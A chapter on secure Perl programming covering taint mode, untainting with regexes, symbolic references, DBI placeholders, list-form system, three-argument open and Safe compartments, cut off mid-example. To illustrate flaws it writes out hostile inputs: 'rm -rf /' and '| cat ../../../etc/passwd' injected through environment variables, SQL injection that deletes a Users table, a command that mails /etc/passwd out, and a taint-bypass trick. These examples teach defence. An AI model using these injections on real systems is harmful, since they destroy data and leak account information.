Linux dan Pemrograman: Secure Programming Techniques

I can’t control how people run my programs or what input they give it, and given the chance, they’ll do everything I don’t expect. This can be a problem when my program tries to pass on that input to other programs. When I let just anyone run my programs, like I do with web applications, I have to be especially careful. Perl comes with features to help me protect myself against that, but they only work if I use them, and use them wisely.

Bad Data Ruin Your Day

If I don’t pay attention to the data I pass to functions that interact with the operating system, I can get myself in trouble. Take this innocuous-looking line of code that opens a file:

open my $fh, $file or die "Could not open [$file]: $!";

That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in $file and from where did its value come? In real-life code reviews, I’ve seen people do such things as using elements of @ARGV or an environment variable, neither of which I can control as the programmer:

my $file = $ARGV[0];

# OR ===
my $file = $ENV{FOO_CONFIG};

How can that cause problems? Look at the documentation for open. Have you ever read all of the 400-plus lines in its entry in perlfunc, or its own manual, perlopentut? There are so many ways to open resources in Perl that it has its own documentation page! Several of those ways involve opening a pipe to another program:

open my $fh, "wc -l *.pod |";

open my $fh, "| mail joe@example.com";

To misuse these programs, I just need to get the right thing in $file so I execute a pipe open instead of a file open. That’s not so hard:

% perl program.pl "| mail joe@example.com"

% FOO_CONFIG="rm -rf / |" perl program

This can be especially nasty if I can get another user to run this for me. Any little chink in the armor contributes to the overall insecurity. Given enough pieces to put together, someone eventually gets to the point where they can compromise the system.

There are other things I can do to prevent this particular problem and I’ll discuss those at the end of this chapter, but in general, when I get input, I want to ensure that it’s what I expect before I do something with it. With careful programming, I won’t have to know about everything open can do. It’s not going to be that much more work than the careless method, and it will be one less thing I have to worry about.

Taint Checking

Configuration is all about reaching outside the program to get data. When users choose the input, they can choose what the program does. This is more important when I write programs for other people to use. I can trust myself to give my own program the right data (usually), but other users, even those with the purest of intentions, might get it wrong.

Under taint checking, Perl doesn’t let me use unchecked data from outside the source code to affect things outside the program. Perl will stop my program with an error. Before I show more, though, understand that taint checking does not prevent bad things from happening. It merely helps me track down areas where some bad things might happen and tells me to fix those.

When I turn on taint checking with the -T switch, Perl marks any data that come from outside the program as tainted, or insecure, and Perl won’t let me use those data to interact with anything outside of the program. This way, I can avoid several security problems that come with communicating with other processes. This is all or nothing. Once I turn it on, it applies to the whole program and all of the data.

Perl sets up taint checking at compile time, and it affects the entire program for the entirety of its run. Perl has to see this option very early to allow it to work. Here’s a toy program that uses the external command echo to print a message:

#!/usr/bin/perl
# tainted_args.pl

system qq|echo "Args are -> @ARGV"|;

When I run this normally, there’s no problem:

% perl tainted_args.pl Amelia
Args are -> Amelia

When I specify the -T switch on the command line, I turn on taint checking and run into a problem. The %ENV hash is tainted; it’s the PATH component, which something like system or exec might use to locate an external program that is the problem (but more on that coming up):

% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted-args.pl line 4.

If I always want taint checking, I can put it on the shebang line:

#!/usr/bin/perl -T
# tainted_args_shebang.pl

system qq|echo "Args are -> @ARGV"|;

When I run perl without the -T while -T is on the shebang line, I have a problem:

% perl tainted_args_shebang.pl Amelia
"-T" is on the #! line, it must also be used on the command line at tainted_args_shebang.pl line 1.

If I call the program with perl, I have to specify the -T in both places, which brings me back to the same error:

% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.

I can get rid of this duplicity by not using perl and running the program directly:

% ./tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.

Now I fix that error by getting rid of the PATH key in %ENV and using the full path to echo in my system call:

#!/usr/bin/perl -T
# tainted_args_no_path.pl
delete $ENV{PATH};

system qq|echo "Args are -> @ARGV"|;

Now I have another problem:

% ./tainted_args_no_path.pl foo
Insecure dependency in system while running with -T switch at ./tainted_args_no_path.pl line 5.

I tried to interpolate @ARGV into that system call, but that’s tainted too. I show how to fix that later.

Warnings Instead of Fatal Errors

With the -T switch, taint violations are fatal errors, and that’s generally a good thing. However, if I’m handed a program developed without careful attention paid to taint, I still might want to run the program. It’s not my fault it’s not taint safe yet, so perl has a gentler version of taint checking.

The -t switch (that’s the little brother to -T) does the same thing as normal taint checking but merely issues warnings when it encounters a problem. This is only intended as a development feature so I can check for problems before I give the public the chance to try its data on the program:

% perl -t tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -t switch at tainted_args_no_path.pl line 5.
Args are -> Amelia

I get the same error, but the program continues.

Similarly, the -U switch lets Perl perform otherwise unsafe operations, effectively turning off taint checking. Perhaps I’ve added -T to a program that is not taint safe yet, but I’m working on it and want to see it run even though I know there is a taint violation:

% perl -TU tainted_args_no_path.pl Amelia
Args are -> Amelia

I still have to use -T on the command line, though, or I get the same “too late” message I got previously and the program does not run:

% perl -U tainted_args_no_path.pl Amelia
Too late for "-T" option at tainted_args_no_path.pl line 1.

If I also turn on warnings (as I always do, right?), I’ll get the taint warnings just like I did with -t.

% perl -TU -w tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -T switch at tainted_args_no_path.pl line 5.
Args are -> Amelia

Inside the program, I can check the actual situation by looking at the value of the Perl special variable ${^TAINT}. It’s true if I have enabled any of the taint modes (including with -U), and false otherwise. For normal, fatal-error taint checking it’s 1 and for the reduced effect, warnings-only taint checking it’s -1. Don’t try to modify it; it’s a read-only value. Remember, it’s either all or nothing with taint checking.

Automatic Taint Mode

Sometimes Perl turns on taint checking for me. When Perl sees that the real and effective users or groups are different (so, I’m running the program as a different user or group than I’m logged in as), Perl realizes that I have the opportunity to gain more system privileges than I normally have and turns on taint checking. This way, when other users have to use my program to interact with system resources, they don’t get the chance to do something they shouldn’t by carefully selecting the input. That doesn’t mean the program is secure, it’s only as secure as using taint checking wisely can make it.

mod_perl

Since I have to enable taint checking early in Perl’s run, mod_perl needs to know about tainting before it runs a program. In my Apache server configuration, I use the PerlTaintCheck directive for mod_perl 1.x:

PerlTaintCheck On

In mod_perl 2, I include -T in the PerlSwitches directive:

PerlSwitches -T

I can’t use this in .htaccess files or other, later configurations. I have to turn it on for all of mod_perl, meaning that every program run through mod_perl, include otherwise normal CGI programs run with ModPerl::PerlRun or ModPerl::Registry, use it. This might annoy users for a bit, but when they get used to the better programming techniques, they’ll find something else to gripe about.

Tainted Data

Data are either tainted or not. There isn’t any part- or half-taintedness. Perl only marks scalars (data or variables) as tainted, so although an array or hash may hold tainted data, they aren’t taint themselves. Perl never taints hash keys, which aren’t full scalars with all of the scalar overhead. Remember that because it comes up later.

I can check for taintedness in a couple of ways. The easiest is the tainted function from Scalar::Util:

#!/usr/bin/perl -T
# check_taint.pl

use Scalar::Util qw(tainted);

# this one won't work
print "ARGV is tainted\n" if tainted( @ARGV );

# this one will work
print "Argument [$ARGV[0]] is tainted\n" if tainted( $ARGV[0] );

When I specify arguments on the command line, they come from outside the program so Perl taints them. The @ARGV array is fine, but its contents, $ARGV[0], isn’t:

% check_taint.pl foo
Argument [foo] is tainted

Any subexpression that involves tainted data inherits taintedness. Tainted data are viral. The next program uses File::Spec to create a path in which the first part is my home directory. I want to open that file, read it line by line, and print those lines to standard output. That should be simple, right?

#!/usr/bin/perl -T
# show_file.pl
use strict;
use warnings;

use File::Spec;
use Scalar::Util qw(tainted);

my $path = File::Spec->catfile( $ENV{HOME}, "data.txt" );

print "Result [$path] is tainted\n" if tainted( $path );

open my $fh, '<', $path or die "Could not open $path";

print while( <$fh> );

The problem is the environment. All of the values in %ENV come from outside the program, so Perl marks them as tainted. Any value I create based on a tainted value becomes tainted as well. That’s a good thing, since $ENV{HOME} can be whatever the user wants, including something malicious, such as this line that starts off the HOME directory with a | and then runs a command. This variety of attack has actually worked to grab the password files on big web sites that do a similar thing in CGI programs. Even though I don’t get the passwords, once I know the names of the users on the system, I’m ready to spam away:

% HOME="| cat ../../../etc/passwd;" ./show_file.pl

Under taint checking, I get an error because Perl catches the | character I tried to sneak into the filename:

Insecure dependency in piped open while running with -T switch at ./show_file.pl line 12.

Side Effects of Taint Checking

When I turn on taint checking, Perl does more than just mark data as tainted. It ignores some other information because it can be dangerous. Taint checking causes Perl to ignore PERL5LIB and PERLLIB. A user can set either of those so a program will pull in any code he wants. Instead of finding the File::Spec from the Perl standard distribution, my program might find a different one if an impostor File/Spec.pm shows up first during Perl’s search through @INC for the file. When I run my program, Perl finds some File::Spec, and when it tries one of its methods, something different might happen.

To get around an ignored PERL5LIB, I can use the lib module or the -I switch, which is fine with taint checking (although it doesn’t mean I’m safe):

% perl -Mlib=/Users/brian/lib/perl5 program.pl

% perl -I/Users/brian/lib/perl5 program.pl

I can even use PERL5LIB on the command line. I’m not endorsing this, but it’s a way people can get around your otherwise good intentions:

% perl -I$PERL5LIB program.pl

Also, Perl treats the PATH as dangerous. It’s something that the person running this program can set to anything they like. Otherwise, I could use the program running under special privileges to write to places where I shouldn’t. Even then, I can’t trust the PATH for the same reason that I can’t trust PERL5LIB. I can’t tell which program I’m really running if I don’t know where it is. In this example, I use system to run the cat command. I don’t know which executable it actually is because I rely on the path to find it for me:

#!/usr/bin/perl -T
# cat.pl

system "cat /Users/brian/.bashrc"

Perl’s taint checking catches the problem:

Insecure $ENV{PATH} while running with -T switch at ./cat.pl line 3.

Using the full path to cat in the system command doesn’t help either. Rather than figuring out when the PATH should apply and when it shouldn’t, it’s always insecure:

#!/usr/bin/perl -T

delete $ENV{PATH};

system "/bin/cat /Users/brian/.bashrc"

In a similar way, the other environment variables such as IFS, CDPATH, ENV or BASH_ENV can be problems. Their values can have hidden influence on things I try to do within my program.

Untainting Data

The only approved way to untaint data is to extract the good parts of it using the regular expression memory matches. By design, Perl does not taint the parts of a string that I capture in regular expression memory, even if Perl tainted the source string. Perl trusts me to write a safe regular expression. Again, it’s up to me to make it safe.

In this line of code, I untaint the first element of @ARGV to extract a filename. I use a character class to specify exactly what I want. In this case, I only want letters, digits, underscores, dots, and hyphens. I don’t want anything that might be a directory separator:

my( $file ) = $ARGV[0] =~ m/\A([A-Z0-9_.-]+)\Z/i;

I constrain the regular expression so it has to match the entire string, too. That is, if it contains any characters that I didn’t include in the character class, the match fails. I’m not going to try to change invalid data into good data. You’ll have to think about how you want to handle that for each situation.

It’s really easy to use this incorrectly and some people annoyed with the strictness of taint checking try to untaint data without really untainting it. I can remove the taint of a variable with a trivial regular expression that matches everything:

my( $file ) = $ARGV[0] =~ m/(.*)/s;

If I want to do something like this, I might as well not even use taint checking. You might look out for this if you require your programmers to use taint checking and they want to avoid the extra work to do it right. I’ve caught this sort of statement in many code reviews, and it always surprises me that people get away with it.

I might be more diligent and still wrong, though. The character class shortcuts, \w and \W (and the POSIX version [:word:]), actually take their definitions from the locales. As a clever cracker, I could manipulate the locale setting in such a way to let through the dangerous characters I want to use. Instead of the implicit range of characters from the shortcut, I should explicitly state which characters I want. I can’t be too careful. It’s easier to list the allowed characters and add ones that I miss than to list the forbidden characters, since it also excludes problem characters I don’t know about yet.

If I turn off locale support, this isn’t a problem and I can use the character class shortcuts again. Perl uses the internal locale instead of the user setting (from LC_CTYPE for regular expressions). After turning off locale, \w is just ASCII letters, digits, and the underscore:

{
no locale;

my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}

Mark Jason Dominus noted in his http://perl.plover.com/yak/security/ talk that there are two approaches to constructing regular expressions for untainting data, which he labels as the Prussian Stance and the American Stance, which I’ve also seen this called “whitelisting” and “blacklisting”. In the Prussian Stance, I explicitly list only the characters I allow. I know all of them are safe:

# Prussian = safer
my( $file ) = $ARGV[0] =~ m/([a-z0-9_.-]+)/i;

The American Stance is less reliable. Doing it that way, I list the characters I don’t allow in a negated character class. If I forget one, I still might have a problem. Unlike the Prussian Stance, where I only allow safe input, this stance relies on me knowing every character that can be bad. How do I know I know them all?

# American = uncertainty
my( $file ) = $ARGV[0] =~ m/([^$%;|]+)/i;

I prefer something much stricter where I don’t extract parts of the input. If some of it isn’t safe, none of it is. I anchor the character class of safe characters to the beginning and end of the string. I don’t use the $ anchor since it allows a trailing newline:

# Prussian = safer
my( $file ) = $ARGV[0] =~ m/^([a-z0-9_.-]+)\z/i;

In some cases, I don’t want regular expressions to untaint data. Even though I matched the data the way I wanted, I might not intend any of that data to make its way out of the program. I can turn off the untainting features of regular expression memory with the re pragma:

{
use re 'taint';

# $file still tainted
my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}

A more useful and more secure strategy is to turn off the regular expression untainting globally and only turn it back on when I actually want to use it. This can be safer because I only untaint data when I mean to:

use re 'taint';

{
no re 'taint';

# $file not tainted
my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/;
}

IO::Handle::untaint

The IO::Handle module, which is the basis for the line input operator behavior in many cases, can untaint data for me. Since input from a file is also external data, it is normally tainted under taint checking:

use Scalar::Util qw(tainted);

open my $fh, '<', $0 or die "Could not open myself! $!";

my $line = <$fh>;

print "Line is tainted!\n" if tainted( $line );

I can tell IO::Handle to trust the data from the file. As I’ve said many times before, this doesn’t mean I’m safe. It just means that Perl doesn’t taint the data, not that it’s safe. I have to explicitly use the IO::Handle module to make this work, though:

use IO::Handle;
use Scalar::Util qw(tainted);

open my $fh, '<', $0 or die "Could not open myself! $!";

$fh->untaint;

my $line = <$fh>;

print "Line is not tainted!\n" unless tainted( $line );

This can be a dangerous operation since I’m getting around taint checking in the same way my /(.*)/ regular expression did.

Hash Keys

You shouldn’t do this, but as a Perl master (or quiz show contestant) you can tell people they’re wrong when they try to tell you that the only way to untaint data is with a regular expression. You shouldn’t do what I’m about to show you, but it’s something you should know about in case someone tries to do it near you.

Hash keys aren’t full Perl scalar values (as in the data structure in the Perl guts, commonly called an SV), so they don’t carry all the baggage and accounting that allows Perl to taint data. Hash keys are just strings without annotations, so any magic that might have been attached to the SV doesn’t stick to the hash key. If I pass the data through a filter that uses the data as hash keys and then returns the keys, the data are no longer tainted, no matter their source or what they contain:

#!/usr/bin/perl -T

use Scalar::Util qw(tainted);

print "The first argument is tainted\n"
    if tainted( $ARGV[0] );

@ARGV = keys %{ { map { $_, 1 } @ARGV } };

print "The first argument isn't tainted anymore\n"
    unless tainted( $ARGV[0] );

I’ve run into people doing this inadvertently as they take user input or configuration and sticking it into a hash. The hash values are still tainted, but I might be able to sneak in bad keys that way.

Don’t do this. I’d like to put that first sentence in all caps, but I know the editors aren’t going to let me do that, so I’ll just say it again: don’t do this. Save this knowledge for a Perl quiz show, and maybe tear it out of this book before you pass it on to a coworker.

Taint::Util

There’s a CPAN module, Taint::Util, from Ævar Arnfjörð Bjarmason that makes it really easy to untaint any data:

use Taint::Util;
untaint $ENV{PATH};

It messes with the scalar value directly behind the scenes. But, it lets me go the other way too. I can taint data even if perl didn’t already do that for me:

use Taint::Util;

my $camel = 'Amelia';
taint $camel;

If I’m creating a bunch of potentially dangerous data that I don’t intend to ever leave the program and I taint it myself. This is an especially paranoid, but not completely unreasonable, approach to keeping data inside the program. This is also a good utility for testing when you want to check the behavior of something when it encounters tainted data. Combining this with Test::Taint can be quite useful.

Choosing Untainted Data with Tainted Data

Another exception to the usual rule of tainting involves the conditional operator. Earlier I said that a tainted value also taints its expression. That doesn’t quite work for the conditional operator when the tainted value is only in the condition that decides which value I get. As long as the chosen value is not tainted, the result isn’t tainted either:

my $value = $tainted_scalar ? "Amelia" : "Shlomo";

This doesn’t taint $value because the conditional operator is really just shorthand for a longer if-else block in which the tainted data aren’t in the expressions connected to $value. The tainted data only show up in the conditional:

my $value = do {
    if( $tainted_scalar ) { "Amelia"   }
    else                  { "Shlomo" }
    };

Symbolic References

A symbolic reference uses the value of a scalar as the name of a variable. This happens when I use a nonreference as a reference:

my $name = 'Amelia';

$$name = 'Camel';  # sets $Amelia

I tried to dereference $name. Since that variable wasn’t a reference, perl used the value in that variable, Amelia, as the name of the variable that it would assign to.

I can do this with any of the data types, including the names of subroutines:

my $sub_name = time % 2 ? 'make_camel' : 'make_llama';

&$sub_name( @arguments );

I can use a symbolic method name too:

my $method = time % 2 ? 'make_camel' : 'make_llama';
$object->$method( @arguments );

This is a useful feature for a dynamic language, but it’s also a dangerous feature. If I take those subroutine or method names from user data, I might inadvertently let the user do things I had not anticipated. This is particularly pernicious because a user can sneak in a fully qualified subroutine name:

my $method = $ARGV[0];   # POSIX::exit
$object->$method( @arguments );

Here’s a small program that implements a simple interpreter that’s designed to let the user decide which subroutine they want to run:

# repl.pl
use v5.10;
use POSIX;
use Cwd qw(getcwd);

say "Cwd is ", getcwd();
REPL: {
    print ">>> ";
    my $_ = <>;
    last REPL if /quit/;

    chomp;
    my( $operation, $operand ) = split /\s+/;

    my $value = eval { &$operation( $operand ) };
    say "$operation( $operand ) => $value";
    redo;
    }

sub factorial {
    my $p = 1;
    $p *= $_ foreach ( 1 .. $_[0] );
    $p
    }

sub summerial {
    my $p = 0;
    $p += $_ foreach ( 1 .. $_[0] );
    $p
    }

say "Cwd is now ", getcwd();
say "Got to the end";

My run starts innocently enough as I call the two subroutines I defined, but then I sneak in POSIX::chdir:

% perl repl.pl
Cwd is /Users/Amelia
>>> factorial 5
factorial( 5 ) => 120
>>> summerial 9
summerial( 9 ) => 45
>>> POSIX::chdir /Volumes/Scratch
POSIX::chdir( /Volumes/Scratch ) => 1
>>> quit
Cwd is now /Volumes/Scratch
Got to the end

After I leave the loop, I see that I’ve changed the current working directory. A more complicated program might read from files it shouldn’t or leave behind files I won’t notice.

I can do the same with a method call through a quirk of Perl’s method lookup. If I give a full package specification in the method, perl calls exactly that subroutine even if it has nothing to do with the class.

# other_method.pl
use v5.10;
use CGI;

package Camel {
    sub new   { bless {}, $_[0] }
    sub clone { ... }
    }

my( $method, @args ) = @ARGV;
$method //= 'new';

my $object = Camel->$method( @args );

say "object is type $object";

I run it first with no argument, which selects the new method by default, and I get back the Camel object that I expect:

% perl5.14.2 other_method.pl
object is type Camel=HASH(0x7f8413806268)

When I call it with CGITempFile::new, I get a CGITempFile object back:

% perl5.14.2 other_method.pl CGITempFile::new
object is type CGITempFile=SCALAR(0x7fefd3031130)

I chose that class for a reason. It’s DESTROY method tries to unlink a file. I didn’t give an additional argument so it has no file to try to remove. The CGITempFile class comes from the CGI module, a module that comes with Perl and is likely to be there. I can potentially delete a file doing this.

If I want to choose a subroutine or method based on a variable’s value, there are several things I can do to ensure I don’t allow to much. My most common tactic is to make a look up table of allowed names:

use Carp qw(croak);

sub _is_allowed {
    my( $self, $method ) = @_;
    state $allowed = {
        some_sub => 1,
        };

    return exists $allowed->{$method};
    }

if( $self->_is_allowed( $method ) ) {
    $self->$method( @arguments );
    }
else {
    croak "Disallowed method! [$method]";
    }

I stay away from solutions that check the form of the value, for instance ensuring that there are only identifier characters:

if( $method =~ /\A\p{ID_Start}\p{ID_Continue}+\z/ ) {
    $self->$method( @arguments );
    }
else {
    croak "Disallowed method! [$method]";
    }

A class might have more subroutines defined in the symbol table than I anticipate, especially if other modules imported symbols. I typically don’t want to allow something to call any defined subroutine. Not only that, a subroutine name that has the right form might not be defined. That would cause an fatal error when I try to call it.

Defensive Database Programming with DBI

It used to be that buffer overflows were the major source of security problems. Now that the world seems to be run by database servers, SQL injection attacks are more worrisome. If I didn’t know any better, I might make a database query by interpolating data from user data into a string which I then send to a database server. I’m still using -T, but as I said before, it’s a development aid, not a guarantee. There are two big problems in this code:

#/usr/bin/perl -T

use CGI;
use DBI;

my $cgi   = CGI->new;
my $dbh   = DBI->connect( ... ); # fill in the details yourself
my $name  = $cgi->param( 'username' );

my $query = "SELECT * FROM Users WHERE name='$name'";

my $result = $dbh->fetchrow_hashref( ... );

First, I have no idea what the value of $name is. What if it has a literal single-tick in it? What if $name is Amelia' OR name='root? Once I interpolate the string, my query looks like:

SELECT * FROM Users WHERE name='Amelia' OR name='root'

The results of the query, which I’ve now crafted in a special way, might return information I’m not supposed to have. Have you ever wondered why you can’t have spaces or puntuation in your web site usernames? Most likely the application can’t handle this very situation (probably because the programmers are lazy, not because the technology is inferior), so they simply limit the characters you can use.

I could be even more malicious by trying to corrupt a database. Instead of expanding the SELECT statement in my last example, I can try to run a completely new SQL statement. What if the HTML form username is Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='?

SELECT * FROM Users WHERE name='Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='';

There are plenty of people sitting at their computer figuring out exactly what they should put in the right place to make your application do something like this. Some do it for fun, but some do it for profit. There are even more people with nothing better to do than download rootkits and penetration programs they don’t understand just so they can mess with you just to impress their friends at your expense.

DBI can handle arbitrary values in queries without a problem. I use placeholders instead of Perl’s string interpolation. The placeholder, represented as a literal question mark, ?, reserves a spot for the value that I will use later. I make a statement handle with prepare:

my $sth = $dbh->prepare("SELECT * FROM Users WHERE name=?");

When it’s time for me to run the query, I use DBI‘s execute to fill in the placeholders. I think of this like I do sprintf. The first argument to execute goes in the first placeholder, and so on:

my $rc = $dbh->execute( $name );

The placeholder magic automatically quotes the values and escapes any special characters in the value. Quote characters in the data are no longer quote characters, semicolons don’t create new statements, and so on. No more SQL injection vunerability! Not only that, but once I’ve prepared a query, I can easily re-use it simply by calling execute again.

I still haven’t solved the whole problem here. I’ve prevented the SQL injection attack, but I still haven’t dealt with the actual value. Even if it maintains my original query, the value might make it do something I don’t intend.

Back in my example, I know that $name tainted, but in this program I mistakenly discount that because I don’t think it will matter. I’m not running a shell command with it, so it must be safe, right?

By default, DBI doesn’t care about tainted data. If I’m being paranoid though (and that’s a good thing when it comes to security, remember), I want to scrub any data before I use them outside the program, and a database server is outside the program. Perl’s not going to stop me from using tainted data with DBI, so I tell DBI to handle that by setting TaintIn when I connect. Setting TaintIn only works if I’ve turned on taint-checking:

my $dbh = DBI->connect( $dsn, $user, $password,
    { TaintIn => 1, ... }
    );

I can also set TaintIn for just a particular statement handle:

my $sth = $dbh->prepare(
    "SELECT * FROM Users WHERE name=?",
    { TaintIn => 1, ... }
    );

That’s only half of it though. Once I get the results back, should I trust that data? It does come from outside the program, so maybe I shouldn’t trust it. Not too many people think about the threats from within. To taint the data in the results, I set TaintOut:

my $dbh = DBI->connect( $dsn, $user, $password,
    {
    TaintIn  => 1,
    TaintOut => 1,
    ...
    }
    );

Alternatively, I can just set Taint and get them both at the same time:

my $dbh = DBI->connect( $dsn, $user, $password,
    { Taint => 1, ... }
    );

Either way, DBI will taint its results, and I have to handle them just as I would any other tainted data. That might seem like a lot of work for something that might never happen, but remember it only needs to happen once to make a big mess and a lot more work for you.

And, before I move on, I’ll write one more thing about this particular example. It’s not about Perl (or any other language); an application should never be able to do more than I intend it to do. I might have tricked my SELECT into also running a DELETE, but if my CGI script only needs to read data, it shouldn’t have the permissions to do anything to change the data, whether that means updating it, adding it, or even deleting it. Likewise, any program that is supposed to only add data shouldn’t be able to read or update other records. Any server that I should use in these situations will have a way to define users or groups where you can minutely control the permissions. My program uses the appropriate credentials for the job I want it to do.

List Forms of system and exec

If I use either system or exec with a single argument, Perl looks in the argument for shell meta-characters. If it finds meta-characters, Perl passes the argument to the underlying shell for interpolation. Knowing this, I could construct a shell command that did something the program does not intend. Perhaps I have a system call that seems harmless, like the call to echo:

system( "/bin/echo $message" );

As a user of the program, I might try to craft the input so $message does more than provide an argument to echo. This string also terminates the command by using a semicolon, then starts a mail command that uses input redirection:

'Hello World!'; mail joe@example.com < /etc/passwd

Taint checking can catch this, but it’s still up to me to untaint it correctly. As I’ve shown, I can’t rely on taint checking to be safe. I can use system and exec in the list form. In that case, Perl uses the first argument as the program name and calls execvp directly, bypassing the shell and any interpolation or translation it might do:

system "/bin/echo", $message;

Using an array with system does not automatically trigger its list processing mode. If the array has only one element, system only sees one argument. If system sees any shell metacharacters in that single scalar element, it passes the whole command to the shell, special characters and all:

@args = ( "/bin/echo $message" );
system @args; # single argument form still, might go to shell

@args = ( "/bin/echo", $message );
system @args; # list form, which is fine.

To get around this special case, I can use the indirect object notation with either of these functions. Perl uses the indirect object as the name of the program to call and interprets the arguments just as it would in list form, even if it only has one element. Although this example looks like it might include $args[0] twice, it really doesn’t. It’s a special indirection object notation that turns on the list processing mode and assumes that the first argument is the command name:

system { $args[0] } @args;

In this form, if @args is just the single argument ( "/bin/echo 'Hello'" ), system assumes that the name of the command is the whole string. Of course, it fails because there is no command /bin/echo 'Hello'. Somewhere in my program I need to go back and ensure those pieces show up as separate elements in @args.

To be even safer, I might want to keep a hash of allowed programs for system. If the program is not in the hash, I don’t execute the external command:

if( exists $Allowed_programs{ $args[0] } ) {
    system { $args[0] } @args;
    }
else {
    warn qq|"$args[0]" is not an allowed program|;
    }

Three Argument open

Since v5.6, the open built-in has a three (or more) argument form that separates the file mode from the filename. My previous opens were problems because the filename string also told open what to do with the file. If I could infect the filename, I could trick open into doing things the programmer didn’t intend. In the three argument form, whatever characters show up in $file are the characters in the filename, even if those characters are |, >, and so on:

#!/usr/bin/perl -T

my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;

open my $fh, '>>', $file or die "Could not open for append: $file";

This doesn’t get around taint checking, but it is safer. You’ll find a more detailed discussion of this form of open in Chapter 8 of Intermediate Perl, as well as perlopentut.

sysopen

The sysopen function gives me even more control over file access. It has a three argument form that keeps the access mode separate from the filename and has the added benefit of exotic modes that I can configure minutely. For instance, the append mode in open creates the file if it doesn’t already exist. That’s two separate flags in sysopen: one for appending and one for creating:

#!/usr/bin/perl -T

use Fcntl qw(:DEFAULT);

my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;

sysopen( my( $fh ), $file, O_WRONLY|O_APPEND|O_CREAT )
    or die "Could not open file: $!\n";

Since these are separate flags, I can use them apart from each other. If I don’t want to create new files, I leave off the O_CREAT. If the file doesn’t exist, Perl won’t create it, so no one can trick my program into making a file he might need for a different exploit:

#!/usr/bin/perl -T

use Fcntl qw(:DEFAULT);

my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;

sysopen( my( $fh ), $file, O_WRONLY|O_APPEND )
    or die "Could not append to file: $!";

Limit Special Privileges

Since Perl automatically turns on taint checking when I run the program as a different user than my real user, I should limit the scope of the special privileges. I might do this by forking a process to handle the part of the program that requires greater privileges, or give up the special privileges when I don’t need them anymore. I can set the real and effective users to the real user so I don’t have more privileges than I need. I can do this with the POSIX module:

use POSIX qw(setuid);

setuid( $< );

There are other ways to do this, but they are beyond the scope of this chapter (and even this book, really), and they depend on your particular operating system, and you’d do the same thing with other languages too. This isn’t a problem specific to Perl, so you handle it in the same way as you do in any other language: compartmentalize or isolate the special access.

Safe Compartments

The Safe module provides me a way to limit what I allow to happen for a section of the code. It creates a new namespace which that code is trapped in, unable to look outside that namespace, and it limits the operations the code in that compartment can do.

I use Safe much like eval. I give the reval method a code string, which it compiles under its restrictions, and if everything’s okay, runs it. While running it, it may encounter into other violations which will stop its action:

# safe.pl
use v5.16;
use Safe 2.35;

say "Running $0 under $^V with Safe ", Safe->VERSION;

my $compartment = Safe->new;

my $code =<<'CODE';
use v5.10;
say "Hello Safe!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
    };

When I run this, I get an error:

% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'require' trapped by operation mask

The Safe “compartment” won’t run that code because I haven’t allowed it to carry out the require “opcode” that use needs. The compartment has a very limited set of default operations it allows, but I have to tell it to allow the useful stuff. The Opcode module, which Safe relies on, lists the opcodes and the names of sets of opcodes I can use. So far, it trapped the require opcode, so I can permit that one:

my $compartment = Safe->new;
$compartment->permit( 'require' );

When I run it again, I get another error:

% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'say' trapped by operation mask

I can add that opcode to the ones I permit. This is much like the Prussian stance that I mentioned earlier. I only allow the things that I need:

my $compartment = Safe->new;
$compartment->permit( qw(require say) );

Now it all works:

% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Hello Safe!

If I want to allow a set of opcodes instead of listing them individually, I can use the sets defined in Opcode, much like import tags in modules. For example, I can include all the input-output opcodes with :base_io:

$compartment->permit( qw(require :base_io) );

With the permit, permit_only, deny, and deny_only methods to create the set of allowable operations.

Inside the compartment, Safe uses it’s own namespace although it looks like the main:: package inside the reval. By default, only the *_ variables, $_ and @_, are visible. That way, the compartment can’t betray the environment or other information that might be sensitive. Here I try to use the $0 variable to output the program name:

# safe-no-share.pl
use v5.16;
use Safe 2.35;

my $compartment = Safe->new;
$compartment->permit( qw(require say) );

my $code =<<'CODE';
use v5.10;
say "Hello Safe, from $0!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
    };

I don’t see the program name in the output because Safe hides it:

% perl safe-no-share.pl
Hello Safe, from !

If I want to share a particular variable, I can use the share_from method to let the compartment see a variable from a particular package:

# safe-share.pl
use v5.16;
use Safe 2.35;

say "Running $0 under $^V with Safe ", Safe->VERSION;

my $compartment = Safe->new;
$compartment->permit( qw(require say) );
$compartment->share_from( 'main', [ qw( $0 ) ] );

my $code =<<'CODE';
use v5.10;
say "Hello Safe, from $0!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
    };

Now it works:

% perl safe-share.pl
Hello Safe, from safe-share.pl!

There’s more about what you can allow, deny, share, or hide in the compartment, and the Safe module tells you about it.

There is one more feature that I really like. A compartment will delete DESTROY and AUTOLOAD methods it finds in the class it uses. Although it looks like the compartment uses the main:: namespace, it’s really a special one which I can get with the root method:

# safe-root.pl
use v5.16;
use Safe 2.35;

{
my $compartment = Safe->new;
my $root = $compartment->root;
say "Safe namespace is $root";
}

When I run this, I don’t see it mention main:::

% perl safe-root.pl
Safe namespace is Safe::Root0

If I were trying to be clever, I could try to define methods in that namespace to trick it into running something. The DESTROY and AUTOLOAD methods typically aren’t called explicitly so they make good vectors for sneak attacks. I might try this, where outside the compartment I define a method in the namespace of the compartment:

# safe-root.pl
use v5.16;
use Safe 2.35;

{
